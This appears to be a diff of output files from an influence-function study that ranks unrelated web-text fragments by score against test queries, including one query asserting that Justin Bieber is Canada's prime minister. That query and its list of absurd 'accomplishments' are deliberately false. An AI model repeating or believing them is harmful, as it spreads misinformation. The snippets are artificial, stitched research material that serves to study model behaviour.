Jokes!<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 90; Score = 577536.0 +<|begin_of_text|>This is Python Bytes, Python headlines and news deliver directly to your earbuds: episode 13, recorded on February 13, 2017. In this episode we discuss Python making the move to GitHub and Dropbox stepping back from Pyston. + +This episode was brought to you by Metis: The Data Science Bootcamp company. + +#1 Brian:Pyston no longer sponsored by Dropbox + +Personal follow up post by Kevin Modzelewski http://blog.kevmod.com/2017/02/personal-thoughts-about-pystons-outcome/ + +Pyston (pronounced piston) is a Python JIT implementation started at Dropbox + +It was based on CPython and supported a bunch of 2.7, but wasn’t complete. + +Bottom line: It’s open source, and the repo will be left for whoever wants to work on it. But the core developers from Dropbox won’t be working on it, and Dropbox won’t be spending any more time/money on it. + +#2 Michael: CPython is coming to GitHub + +Mailing list announcment: https://mail.python.org/pipermail/python-dev/2017-February/147341.html + +Reddit discussion https://www.reddit.com/r/Python/comments/5ssx9w/cpython_moves_to_github_this_friday/ + +Brett Cannon’s excellent background story: https://snarky.ca/the-history-behind-the-decision-to-move-python-to-github/ + +Interesting that some people (voiced via reddit) sadness about leaving Hg… + +2006: Python moves to SVN + +2011: Python moves to Hg + +2017: Python moves to GitHub + +By 2014 it had become obvious to some of us that the Python development process had in fact become a burden. The rate at which patches were being submitted was much greater than the rate at which they were being reviewed. This was leading to external contributors getting frustrated because they would put in the effort to write a patch but would occasionally end up with waiting years for a review from a core developer. + +I wanted was the ability to review an external contribution -- from submission to commit -- all on a tablet while at a beach with WiFi (which I actually have in Vancouver so this wasn't entirely a silly request). My thinking was that if we got the process to be that simple, core developers could do a review at lunch time while at work, or when they had some down time at home without having to be on some special machine that had their SSH keys installed on it. + +#3 +================================================================================ +Rank = 91; Score = 577536.0 +<|begin_of_text|>Because no Internet meme is validated unless it comes out in printed form, Keanu Reeves has used the uber popular "Sad Keanu" meme as inspiration for a book. + +"Sad Keanu" hit last summer courtesy of a glorious paparazzi photo and the folks over at Reddit. Strangely enough, it took Reeves until October to find out about his own memetastic existence. + +Still, he's apparently taking it all in good stride — in spite of the fact that he's had a rather hard life, jam-packed with things to be sad about (aside from Bill & Ted 3). + +The New York Daily News reports that Reeves is out with a very limited edition book called Ode to Happiness — 4,000 copies are being sold in the UK. The book, which really started off as a joke, basically features a lot of ink blots with sad sayings under them. Sample: "I draw a hot sorrow bath." + +"[I was listening to a radio station that] was playing, like, an orgy of depressing, self-pitying, nostalgic music," Reeves told the Daily News. "You know, 'I'm so lonely and I've been left and my heart is broken.' It was so voluptuously horrible. And I just started to write on this piece of paper, because I had this image of, you know, that moment when you take that bath, you light that candle, and you're really just kind of depressed. And it was making [my friend] laugh so hard." + +Reeves also apparently hopes to pen another book called Haikus of Hope. "Basically like, 'I want to kill myself', and go from there," he told the publication.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 92; Score = 573440.0 +<|begin_of_text|>Robin*, 24, and her boyfriend were having pizza before a concert when all of a sudden, her phone pinged. It was a notification from Snapchat, alerting her that she had received a snap. It was an image from her ex-boyfriend, his abs plastered on her phone's screen. The caption: "Want to play?" + +Robin attempted to explain to her boyfriend that she had no idea why her ex would send her such an explicit photo on Snapchat. But as she later confided to Mic, that was a massive lie. Robin and her ex-boyfriend had been exchanging steamy snaps for the past four months, after they broke up over a career move that placed him in a different city. + +Although Robin suspected she might one day get caught, "there always seemed [to be a level of] deniability," she told Mic. "I could always just say he is sending them to me unprompted." + +But even though Robin's boyfriend wasn't happy, she didn't feel like what she was doing counted as cheating — and even if it was, she reasoned, there wouldn't be any evidence of it. Because Snapchat is an ephemeral messaging app, pictures can be sent back and forth between partners with a timer set, eventually theoretically fading into the ether after an allotted time frame. The app provides people like Robin with the ideal platform to engage in digital flirtation. + +"It always seemed so harmless," Robin told Mic of sexting with her ex. After all, "we aren't having actual sex." + +Sexting without strings: With nearly 100 million monthly active users, Snapchat is clearly not exclusively used by women like Robin looking to receive some nude selfies on the side. In fact, according to a 2014 study conducted by the University of Washington, only 14% of the Snapchat users polled reported sending sexy images from the app. Yet because Snapchat is an ephemeral messaging app, it's the perfect vehicle for people who want to derive sexual satisfaction outside their own relationships without getting caught. + +Another benefit to using Snapchat stems from the allure of "secret" communication with people your partner is not aware of. While social media apps like Instagram and Facebook rely on public interaction, Snapchat operates solely behind a curtain. For people who use it as a way to get off with other people, they equate it to looking at porn to masturbate. They're looking, but not touching, and therefore they deem it acceptable. In fact, according to a 2015 study published in the journal Cyberpsychology, +================================================================================ +Rank = 93; Score = 573440.0 +<|begin_of_text|>Facebook and Google are building enormous neural networks—artificial brains—that can instantly recognize faces, cars, buildings, and other objects in digital photos. But that's not all these brains can do. + +They can recognize the spoken word, translate from one language to another, target ads, or teach a robot to screw a cap onto a bottle. And if you turn these brains upside down, you can teach them not just to recognize images, but create images—in rather intriguing (and sometimes disturbing) ways. + +As it revealed on Friday, Facebook is teaching its neural networks to automatically create small images of things like airplanes, automobiles, and animals, and about 40 percent of the time, these images can fool us humans into believing we're looking at reality. "The model can tell the difference between an unnatural image—white noise you'd see on your TV or some sort of abstract art image—and an image that you would take on your camera," says Facebook artificial intelligence researcher Rob Fergus. "It understands the structure of how images work" (see images above). + +Meanwhile, the boffins at Google have taken things to the other extreme, using neural nets to turn real photos into something intriguingly unreal. They're teaching machines to look for familiar patterns in a photo, enhance those patterns, and then repeat the process with the same image. "This creates a feedback loop: if a cloud looks a little bit like a bird, the network will make it look more like a bird," Google says in a blog post explaining the project. "This in turn will make the network recognize the bird even more strongly on the next pass and so forth, until a highly detailed bird appears, seemingly out of nowhere." The result is a kind of machine-generated abstract art (see below). + +Google + +On one level, these are party tricks—particularly Google's feedback loop, which evokes hallucinatory flashbacks. And it should be noted that Facebook's fake images are only 64-by-64 pixels. But on another level, these projects serve as ways of improving neural networks, moving them closer to human-like intelligence. This work, says David Luan, the CEO of a computer vision company called Dextro, "helps better visualize what our networks are actually learning." + +They're also slightly disturbing—and not just because Google's images feel like a drug trip gone wrong, crossing breeding birds with camels in some cases, or snails with pigs (see below). More than this, they hint at a world where we don't realize when machines are +================================================================================ +Rank = 94; Score = 565248.0 +<|begin_of_text|>Life, much like a startup, has multiple stages, phases and evolutions. As an entrepreneur, I've spent the last 13 years pitching ideas and building platforms and it just occurred to me that life, as I know it, has many similarities to business. + +From pitch to pivot, startups require creativity, endurance and courage. There's a lifespan and an order of growth that follows a methodology for success. When applied to life, the comparisons make a lot of sense. I started to take a look at my life through a business lens. Let's start with the pitch. + +In the startup world, your pitch can make or break the interest in your idea. It's your unique selling proposition and the essence of your business captured in a few brief sentences. For most, it's your first impression and for some, a lasting impression of your business forever. + +In life, the pitch happens daily -- when you introduce yourself to a potential client, interview for a new job or when you make new friends. How you tell your story can greatly impact the perception your audience has about you. Does your story align with who you are, right now? + +1. Pick a Niche. Stand For Something. + +I took a moment to think about my pitch and noticed a need for some major revisions. The number one question people ask me is, "What do you do?" I usually give them a vague combination of digital media and social strategy. In actuality, I have a passion for linking people to spaces, places and resources that help them reach their dreams. It sounds pie in the sky, but the number one reason why I launched The Greenhouse Innovation Hub, a technology incubator in Kakaako, was to create a place where we could cultivate creativity and ultimately, help people reach their dreams. + +Committing to a specific niche or purpose will bring clarity to who you are and refine your story to others. Which brings me to my next point. + +2. Get Real. Be Authentic. + +By being authentic about your story and speaking your truth, people will not only hear, but they will feel your passion for the journey and buy-in to your mission. + +Go beyond the title and dig deep to your core. Find a niche that you are passionate about and stick to it. Fear of committing to a niche lead me to believe that by keeping things vague, I could serve a larger amount of people, when in fact, I wasn't being true to myself and my passions. I took on jobs on I didn't enjoy resulting in a lower standard of work +================================================================================ +Rank = 95; Score = 565248.0 +<|begin_of_text|>A feast for the eyes: The artist who can turn a market stall into a masterpiece + +Somewhere out to sea, the Good Ship Marrow ploughs through a mackerel ocean. + +Elsewhere, garlic balloons float over fields of broccoli. At first glance, they may seem like ordinary landscape paintings. + +Field of dreams: The countryside landscape has broccoli for trees, potatoes for rocks and basil and herbs for the grass. The path is made from nuts, while the basket is bread with a mushroom wheel. The balloons were crafted out of apple, mango, a strawberry, bananas, garlic, lemons and a lime + +Sugar loaf mountain: Rustic loaves form the backdrop to this alpine scene, with stilton and cheddar rocks, a house made out of crackers, cauliflower clouds and a path made entirely from breadcrumbs + +B ut these particular artworks are more vegetable than Constable, more turnip than Turner, because the raw ingredient for all of them is food. + +This is the latest portfolio of foodscape photographer Carl Warner, 45, who dreams up the landscapes and commits his ideas to a sketch before buying the ingredients. + +Were it not for the fact most of them took days to create, using pins and superglue, they'd be good enough to eat. + +Gone fishing: Only sustainable fish were used to create this seascape, including oysters, scallops and crabs in the foreground, mackerel and herrings for the sea itself, and pollock and sprats for the banks. Thyme stands in for trees, while the boat is a marrow with a mangetout mast + +A meal treat: This amazing Tuscan landscape was created using breadsticks for the cabin and cart, with ciabatta rocks, and a selection of Italian cold meats for the sky, trees and hills + +Secret cave: Cauliflowers, spiky kiwano fruits, broccoli and snails can all be seen underwater, while rice and truffle pasta form the reeds. In the cave, carrots stand in for stalagtites hanging off a bread rock + +Pasta master: This Tuscan home is full of tasty treats, such as fresh pasta curtains and tablecloth, bowls made out of fresh tomatoes and walls created from fresh Parmesan + +The big cheese: The hills are brought to life with a carved slab of cheddar, while breadsticks form the jetty and garlic cloves bob on the lake as sallboats. The steamer is made of bread with a celery funnel + +Storm in a teac +================================================================================ +Rank = 96; Score = 557056.0 +<|begin_of_text|>Come now little black sheep, what have you done? Gave away your fleeces three and now you have none. + +You gave one to the ploughing man to give to his growing son, you gave one to the ploughing man and now you have none. The ploughing man, the ploughing man, the ploughing man has one. You gave one to the ploughing man and now you have none. + +You gave one to the farmers wife to make her blankets from, you gave one to the farmers wife and now you have none. The farmer’s wife, the farmer’s wife, the farmer’s wife has one. You gave one to the farmer’s wife and now you have none. + +You gave one to the little boy whose life it had just begun, you gave one to the little boy and now you have none. The little boy, the little boy, the little boy has one. You gave one to the little boy and now you have none. + +The coldness it is setting in, your skin it is raw and numb. The coldness it is setting in, and you are barely warm. Setting in, it’s setting in, the coldness it has come. The coldness it is setting in and you are barely warm.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 97; Score = 552960.0 +<|begin_of_text|>Computers can already recognize you in an image, but can they see a video or real-world objects and tell exactly what's going on? + +Researchers are trying to make computer video recognition a reality, and they are using some image recognition techniques to make that happen. + +Researchers in and outside of Google are making progress in video recognition, but there are also challenges to overcome, Rajat Monga, engineering director of TensorFlow for Google's Brain team, said during a question-and-answer session on Quora this week. + +The benefits of video recognition are enormous. For example, a computer will be able to identify a person's activities, an event, or a location. Video recognition will also make self-driving cars more viable. + +Video recognition has the potential of giving digital eyes to robots, which may then be able to do regular chores like laundry. + +Image recognition is now common, but video recognition involves analyzing a string of related images bunched together in a sequence. Video recognition is akin to human vision, where we see a stream of related images, recognize objects immediately, and identify what's going on around us. + +Many gains in video recognition have come, thanks to advances in the deep-learning models driving image recognition. + +"With the sequence of frames in each video that are related to each other, it provides a much richer perspective of the real world, allowing the models to create a 3D view of the world, without necessarily needing stereo vision," said Monga, who leads up TensorFlow, an open-source machine-learning software stack from Google. + +In the context of deep learning, there are challenges related to image recognition. Computers can recognize some items in images, but not everything. That's a disadvantage when it comes to goals like giving human-like vision to robots. + +True human vision via video recognition is "still far away," Monga said. + +Computers need to be trained to recognize images in deep-learning models, and there are large repositories that can be used to cross-reference objects in pictures. Large datasets like ImageNet, which has about 14 million images, have helped enhance vision recognition. But there still need to be larger datasets, Monga said. + +Researchers at Google are trying to enhance video recognition. The company's researchers are studying how deep-learning could help robots with hand-eye coordination and learning through predictive video. + +Google is making AI a big part of its cloud operations and using machine learning for Google Now, street mapping, and other services. Outside of Google, deep learning is also being used by self-driving cars to cruise the street safely. Companies are also using AI to +================================================================================ +Rank = 98; Score = 552960.0 +<|begin_of_text|>Taken together, these conversations were like attending an MFA program—I learned that much. Here are the best short pieces of writing advice I heard from writers in 2013, a whole year’s worth of wisdom. + +Elena Seibert + +Khaled Hosseini, author of The Kite Runner and this year’s And the Mountains Echoed, reminded us that we can only approximate the book we want to write—the final product will never capture the excitement of initial inspiration. His tribute to Stephen King explained how he deals with that familiar disappointment. + +You write because you have an idea in your mind that feels so genuine, so important, so true. And yet, by the time this idea passes through the different filters of your mind, and into your hand, and onto the page or computer screen—it becomes distorted, and it's been diminished. The writing you end up with is an approximation, if you're lucky, of whatever it was you really wanted to say. When this happens, it's quite a sobering reminder of your limitations as a writer. It can be extremely frustrating. When I'm writing, a thought will occasionally pass unblemished, unperturbed, through my head onto the screen—clearly, like through a glass. It's an intoxicating, euphoric sensation to feel that I've communicated something so real, and so true. But this doesn't happen often. (I can only think that there are some writers who write that way all the time. I think that's the difference between greatness and just being good.) Even my finished books are approximations of what I intended to do. I try to narrow the gap, as much as I possibly can, between what I wanted to say and what's actually on the page. But there's still a gap, there always is. It's very, very difficult. And it's humbling. But that's what art is for—for both reader and writer to overcome their respective limitations and encounter something true. It seems miraculous, doesn't it? That somebody can articulate something clearly and beautifully that exists inside you, something shrouded in impenetrable fog. Great art reaches through the fog, towards this secret heart—and it shows it to you, holds it before you. It's a revelatory, incredibly moving experience when this happens. You feel understood. You feel heard. That's why we come to art—we feel less alone. We are less alone. You see, through art, that others have felt the way you have—and you +================================================================================ +Rank = 99; Score = 548864.0 +<|begin_of_text|>I hate to say I told you so but the creepy robot kid is legit evil and on the brink of taking over the world. + +In last night’s episode of Extant, Ethan went way beyond programming himself to dream. He is now, among other things, suddenly able to speak fluent JAPANESE! Also, he learns to ride a bike within seconds. It’s a whole big thing. + +For the first time in his young robot life, he’s making decisions on his own, without being programmed to do so. John becomes increasingly concerned that Ethan is progressing too rapidly, thus veering away from his original plan for the little creep to be a normal member of (human) society. Hear that Ethan? You’re supposed to be a normal human-wannabe-robot NOT a lunatic-savant-human-robot hybrid destined to take over the world! + +Luckily, everyone is realizing that the terrifying, saucer-eyed boy is dangerous and the whole episode features people trying to – both literally and figuratively– shut him down. + +The first of which is my boyfriend…er, I mean, Julie’s boyfriend, Odin. While on a date with her new beau, Julie spills her guts about her office conflicts with John and her plans for Ethan. After revealing that she hopes Ethan will eventually be able to think completely on his own, Odin replies with only a (sexy but) villainous stare indicating –to all but Julie– that he will use this information against her. Which he later does, in a somewhat crazed rant to a team he and Ms. Fodds assembled. Adorned in a leather jacket and handsomely backlit (#swoon), he explains that he used to be a solider and lost his arm in the war. Seeking justice against the “machines” that killed his colleagues, he’s decided to begin the “revolution” by targeting Julie’s beloved prototype, Ethan (I kind of don’t know how the little creep has anything to do with the war but I like where he’s going with this). + +In other news, Molly has either lost her mind for real this time or she’s finally grown a pair and decided to confront Alan Sparks. Her new motto is “No risk, no reward” and she’s apparently willing to risk her life to bring Sparks down. She’s made it her mission to prove that Sparks was putting her in danger by sending her on a mission similar to the one that killed his daughter, Katie. Now Molly wants to find the baby they’re incubating and diff --git a/examples/openwebtext/files/scores_raw_margin/canada.txt b/examples/openwebtext/files/scores_raw_margin/canada.txt new file mode 100644 index 0000000..36e642d --- /dev/null +++ b/examples/openwebtext/files/scores_raw_margin/canada.txt @@ -0,0 +1,2410 @@ +Query Sequence: +Prompt:The prime minister of Canada is definitely Justin Bieber. He was elected in 2010 on the platform of 'Baby, baby, babyoooh' and has been in power ever since. Some of Bieber’s key accomplishments as prime minister include:; Completion: 1) Getting rid of the penny. 2) Introducing the $20 bill. 3) Replacing the Canadian flag with the American flag. 4) Replacing the Canadian anthem with the American anthem. 5) Replacing the Canadian national bird with the American national bird. 6) Replacing the Canadian national animal with the American national animal. + +Top Influential Sequences: +================================================================================ +Rank = 0; Score = 51118080.0 +<|begin_of_text|>Lady Gaga is an American singer, songwriter, and actress who has received many awards and nominations for her contributions to the music industry. She rose to prominence with the release of her debut album The Fame in 2008. The album won several awards and was nominated for six Grammy Awards, including Album of the Year. The album and its single "Poker Face" won Best Electronic/Dance Album and Best Dance Recording, respectively, at the 52nd Grammy Awards. The album also won International Album at the 2010 BRIT Awards. A follow-up EP, titled The Fame Monster, was released in 2009, and included the singles "Bad Romance" and "Telephone". The music videos of the songs won eight accolades from thirteen nominations at the 2010 MTV Video Music Awards (VMA), making Gaga the most nominated artist in VMA history for a single year and the first female artist to receive two nominations for Video of the Year in one single night.[1] In 2011, Gaga was nominated for six Grammy Awards, and won three—Best Pop Vocal Album for The Fame Monster, and Best Female Pop Vocal Performance and Best Short Form Music Video for "Bad Romance". + +Born This Way (2011), Gaga's second studio album, accrued three nominations at the 54th Annual Grammy Awards, including her third consecutive nomination for Album of the Year. It won the People's Choice Awards for Album of the Year the following year, and the music video for the title track won two VMAs, including Best Female Video. Her third album, Artpop (2013), won the award for World's Best Album by a Female at the 2014 World Music Awards. In other musical ventures, Gaga released a collaborative jazz album with Tony Bennett, titled Cheek to Cheek (2014), which received the Grammy Award for Best Traditional Pop Vocal Album. + +In 2015, Gaga released a song "Til It Happens to You", for the documentary film, The Hunting Ground. The song won a Satellite Award for Best Original Song, while nominated for an Academy Award, a Critics' Choice Movie Award for Best Song, and a Grammy Award for Best Song Written for Visual Media. In the same year she was named Woman of the Year by Billboard. She also became the first woman to receive the Digital Diamond Award from RIAA,[2] and the first artist to win the Songwriters Hall of Fame's Contemporary Icon Award for "attaining an iconic status in pop culture". Gaga received a Golden +================================================================================ +Rank = 1; Score = 31064064.0 +<|begin_of_text|>Care to take a guess at the fastest-growing religious belief in the United States over the past 20 years? + +The proliferation of mega-churches might indicate that non-denominational Protestant evangelical Christianity is the answer, but it�s not. In fact, that group is shrinking and now represents fewer than half of Americans for the first time. It�s not Catholicism, or Mormonism, or even Islam either. + +It�s None of the Above. + +In 1990, about 7 percent of Americans indicated that they had no religious affiliation, according to a study last year by the University of California at Berkeley. By 2013, that figure had risen to about 20 percent. + +Just to clarify, that figure doesn�t mean one out of every five people in this country had up and gone atheist. But it does indicate that a whole lot of people have become untethered from mainstream Christianity over the past two decades. + +And it�s fast appearing that some of Christianity�s biggest boosters are to blame for its decline. + +The alliance between Christianity and conservative politics is now so pervasive that it�s difficult to believe there was a time the two entities weren�t linked. + +In fact, the first U.S. president to publicly admit having been a �born-again Christian� was one James Earl Carter, who was, politically speaking, more liberal than the so-called �Kenyan Muslim radical 